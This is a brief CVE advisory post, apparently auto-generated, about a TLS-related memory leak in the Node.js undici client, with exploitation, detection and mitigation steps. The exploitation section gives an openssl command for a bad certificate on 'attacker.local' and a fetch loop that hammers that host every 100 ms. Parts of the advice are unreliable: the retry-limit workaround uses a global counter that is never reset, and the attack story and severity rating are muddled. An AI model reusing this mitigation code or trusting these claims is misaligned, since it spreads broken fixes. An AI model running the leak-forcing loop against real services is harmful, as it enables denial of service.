Listen to this Post
How the CVE Works
The vulnerability in undici (Node.js HTTP client) arises when handling invalid TLS certificates during repeated webhook requests. When undici attempts to connect to a malicious server with a malformed certificate, it fails to properly release memory allocated during TLS handshake processing. Each failed connection attempt leaks memory, and if an attacker forces repeated requests (e.g., via retry logic), this leads to uncontrolled memory consumption. The issue affects undici versions <5.29.0, 6.0.0β6.21.2, and 7.0.0β7.5.0.
DailyCVE Form
Platform: Node.js (undici)
Version: <5.29.0, 6.0.0β6.21.2, 7.0.0β7.5.0
Vulnerability: Memory leak via TLS
Severity: Critical
Date: May 15, 2025
What Undercode Say:
Exploitation
1. Malicious Server Setup:
openssl req -x509 -newkey rsa:2048 -keyout bad.key -out bad.crt -days 365 -nodes -subj "/CN=attacker.local"
Host a server with this invalid cert to trigger undiciβs TLS error handling.
2. Force Webhook Retries:
const { fetch } = require('undici');
setInterval(() => fetch('https://attacker.local/webhook'), 100);
Detection
Check for memory growth in Node.js:
node --inspect -e "require('undici').fetch('https://invalid-cert-server')"
Monitor heap usage via Chrome DevTools or `process.memoryUsage()`.
Mitigation
1. Patch Immediately:
npm update undici --save
2. Workaround: Implement retry limits:
const MAX_RETRIES = 3;
let retries = 0;
async function safeFetch(url) {
try {
return await fetch(url);
} catch (err) {
if (++retries >= MAX_RETRIES) throw err;
return safeFetch(url);
}
}
3. TLS Validation: Enforce strict certificate checks:
const { Agent, setGlobalDispatcher } = require('undici');
const agent = new Agent({ tls: { rejectUnauthorized: true } });
setGlobalDispatcher(agent);
4. Monitoring: Use `–max-old-space-size` to cap memory:
node --max-old-space-size=4096 app.js
References
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
